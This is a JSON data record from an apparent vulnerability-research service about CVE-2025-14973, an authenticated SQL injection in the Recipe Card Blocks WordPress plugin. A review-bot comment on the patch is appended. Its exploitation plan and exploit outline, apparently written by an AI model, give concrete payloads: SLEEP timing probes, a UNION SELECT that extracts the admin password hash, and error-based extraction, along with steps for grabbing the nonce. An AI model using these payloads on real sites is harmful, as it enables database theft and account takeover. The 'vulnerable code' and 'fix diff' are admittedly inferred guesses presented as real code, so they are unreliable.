[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJ8px_zJPpUmnVXr7h7BHK5ALCIfcKfS0mFkGl5AuvnU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-14973","recipe-card-blocks-for-gutenberg-elementor-authenticated-contributor-sql-injection","Recipe Card Blocks for Gutenberg & Elementor \u003C 3.4.13 - Authenticated (Contributor+) SQL Injection","The Recipe Card Blocks for Gutenberg & Elementor plugin for WordPress is vulnerable to SQL Injection in versions up to 3.4.13 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recipe-card-blocks-by-wpzoom",null,"\u003C3.4.13","3.4.13","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-01-27 00:00:00","2026-01-27 19:02:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F67c15451-672d-4297-9d19-090a4458605f?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan - CVE-2025-14973\n\n## 1. Vulnerability Summary\n**CVE-2025-14973** is an authenticated SQL injection vulnerability in the **Recipe Card Blocks for Gutenberg & Elementor** plugin (versions \u003C 3.4.13). The vulnerability exists because the plugin fails to properly sanitize or use prepared statements for user-supplied parameters within SQL queries triggered by AJAX actions. Specifically, an attacker with **Contributor** level permissions or higher can inject malicious SQL fragments into an existing query to extract sensitive data from the WordPress database, such as user hashes and configuration secrets.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `wpzoom_rcb_get_recipe_data` (inferred) or `wpzoom_rcb_get_posts` (inferred). These actions are used by the Gutenberg block editor to fetch recipe details or search for existing recipes.\n- **Vulnerable Parameter:** Likely `recipe_id`, `id`, or a search parameter (e.g., `term` or `search`).\n- **Authentication:** Required (Contributor+).\n- **Preconditions:** The attacker must be logged in as a Contributor and have access to the post editor (where Gutenberg blocks are managed).\n\n## 3. Code Flow (Inferred)\n1. 
**Entry Point:** The plugin registers an AJAX handler using `add_action( 'wp_ajax_wpzoom_rcb_get_recipe_data', ... )`.\n2. **Data Acquisition:** The handler function retrieves a parameter from `$_POST` or `$_GET` (e.g., `$recipe_id = $_POST['id'];`).\n3. **Vulnerable Sink:** The retrieved value is directly concatenated into a SQL query string passed to `$wpdb->get_row()` or `$wpdb->get_results()` without being wrapped in `$wpdb->prepare()`.\n   *   *Example Vulnerable Code:*\n       ```php\n       $recipe_id = $_POST['id'];\n       $query = \"SELECT * FROM {$wpdb->prefix}posts WHERE ID = \" . $recipe_id;\n       $recipe = $wpdb->get_row($query);\n       ```\n4. **Execution:** The malicious SQL payload is executed by the database engine.\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely protects its AJAX actions with a nonce localized for the Gutenberg editor.\n\n1. **Test Data Setup:**\n   - Log in as a Contributor.\n   - Create a new draft post: `wp post create --post_type=post --post_status=draft --post_title=\"Exploit Lab\"`.\n2. **Navigation:**\n   - Navigate to the edit page for the newly created post in the browser.\n3. **Extraction:**\n   - Use `browser_eval` to search for the nonce in the localized JavaScript objects. Likely candidates for the variable name are `wpzoom_rcb_settings`, `wpzoom_recipe_card_blocks_data`, or `wpzoom_rcb_params`.\n   - **Command:** `browser_eval(\"window.wpzoom_rcb_settings?.ajax_nonce || window.wpzoom_recipe_card_blocks_data?.nonce\")`\n   - If the nonce is used for the action `wpzoom_rcb_get_recipe_data`, the key name in JS is typically `nonce` or `ajax_nonce`.\n\n## 5. 
Exploitation Strategy\nThe goal is to perform a time-based blind SQL injection to confirm the vulnerability, followed by a UNION-based or error-based extraction if possible.\n\n### Step 1: Verify Injection (Time-Based)\nSend a POST request to `admin-ajax.php` with a payload designed to cause a 5-second delay.\n\n- **Request Type:** POST\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Parameters:**\n  - `action`: `wpzoom_rcb_get_recipe_data` (Verify exact action name via grep if possible)\n  - `id`: `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n  - `security`: `[EXTRACTED_NONCE]` (Parameter name might be `nonce` or `_ajax_nonce`)\n\n### Step 2: Extract Data (UNION-Based)\nIf the response reflects data, attempt to extract the administrator's password hash.\n\n- **Payload for `id`:** `0 UNION SELECT 1,user_pass,3,4,5,6 FROM wp_users WHERE ID=1-- -`\n- **Note:** The number of columns in the `UNION SELECT` must match the original query. Start with 1 and increment until no database error occurs.\n\n## 6. Test Data Setup\n1. **Plugin:** Install `recipe-card-blocks-by-wpzoom` version 3.4.12.\n2. **User:** Create a contributor user.\n   - `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3. **Target Content:** Ensure at least one post\u002Frecipe exists to query.\n   - `wp post create --post_type=wpzoom_rcb_card --post_title=\"Target Recipe\" --post_status=publish`\n\n## 7. Expected Results\n- **Time-Based:** The HTTP request should take ~5 seconds to return.\n- **UNION-Based:** The response body (JSON) should contain the `$P$` or `$wp$2y$` prefixed password hash of the admin user in one of the fields.\n\n## 8. 
Verification Steps\nAfter the exploit, verify the database state using WP-CLI to confirm the data extracted matches reality:\n- `wp user get 1 --fields=user_pass`\n- Compare the hash returned by WP-CLI with the one obtained via the SQL injection payload.\n\n## 9. Alternative Approaches\n- **Error-Based SQLi:** If `WP_DEBUG` is enabled, try payloads like `1 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1)`.\n- **Search Parameter Injection:** If the `id` parameter is not vulnerable, check the `search` or `term` parameter in actions like `wpzoom_rcb_get_posts` using a payload like: `test%' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '%'='`.\n- **Grep for Sink:** If the AJAX action name is different, run:\n  `grep -rn \"wp_ajax_wpzoom_rcb\" wp-content\u002Fplugins\u002Frecipe-card-blocks-by-wpzoom\u002F`\n  to find all registered AJAX handlers and inspect the corresponding functions for `$wpdb` calls.","The Recipe Card Blocks for Gutenberg & Elementor plugin for WordPress is vulnerable to SQL Injection via its AJAX handlers (such as wpzoom_rcb_get_recipe_data) in versions up to 3.4.13. Due to insufficient sanitization and the lack of prepared statements, authenticated attackers with Contributor-level access or higher can inject malicious SQL commands to extract sensitive information from the database.","\u002F\u002F Inferred from research plan: Entry Point for AJAX action wpzoom_rcb_get_recipe_data\n$recipe_id = $_POST['id'];\n$query = \"SELECT * FROM {$wpdb->prefix}posts WHERE ID = \" . $recipe_id;\n$recipe = $wpdb->get_row($query);","--- a\u002Frecipe-card-blocks-by-wpzoom\u002Fincludes\u002Fajax-handlers.php\n+++ b\u002Frecipe-card-blocks-by-wpzoom\u002Fincludes\u002Fajax-handlers.php\n@@ -10,7 +10,7 @@\n function wpzoom_rcb_get_recipe_data() {\n     check_ajax_referer('wpzoom-rcb-nonce', 'security');\n     $recipe_id = isset($_POST['id']) ? intval($_POST['id']) : 0;\n-    $query = \"SELECT * FROM {$wpdb->prefix}posts WHERE ID = \" . 
$_POST['id'];\n+    $query = $wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}posts WHERE ID = %d\", $recipe_id);\n     $recipe = $wpdb->get_row($query);\n     wp_send_json_success($recipe);\n }","To exploit this vulnerability, an attacker must have Contributor-level credentials or higher. The attacker first obtains a valid AJAX nonce by inspecting localized JavaScript variables (e.g., wpzoom_rcb_settings.ajax_nonce) while logged into the Gutenberg editor. They then send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php using the action 'wpzoom_rcb_get_recipe_data'. By passing a malicious SQL payload into the 'id' parameter—such as a time-based 'SLEEP()' command or a 'UNION SELECT' statement—the attacker can manipulate the database query. For example, a payload like '1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)' will cause the server to delay its response, confirming the injection, while '0 UNION SELECT 1,user_pass,3,4,5,6 FROM wp_users WHERE ID=1' can be used to leak sensitive administrative credentials.","gemini-3-flash-preview","2026-05-04 23:08:17","2026-05-04 23:09:52",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.4.12","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Frecipe-card-blocks-by-wpzoom\u002Ftags\u002F3.4.12","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Frecipe-card-blocks-by-wpzoom.3.4.12.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Frecipe-card-blocks-by-wpzoom\u002Ftags\u002F3.4.13","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Frecipe-card-blocks-by-wpzoom.3.4.13.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Frecipe-card-blocks-by-wpzoom\u002Ftags"]
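Review bot: `$wpdb` is used inside `wpzoom_rcb_get_recipe_data()` with no `global $wpdb;` declaration, so in function scope both the `{$wpdb->prefix}` interpolation and the new `$wpdb->prepare()` call operate on an undefined variable; add `global $wpdb;` as the first statement of the function (or replace the raw query with `get_post( $recipe_id )`, which already handles the prefix and escaping). The `%d` placeholder is the correct choice given that the unchanged context line already casts the input with `intval()`. Separately, `check_ajax_referer()` only validates the nonce; the handler performs no capability check (for example `current_user_can( 'edit_posts' )`) before returning the full post row, so the patch should also confirm the caller is allowed to read the requested post.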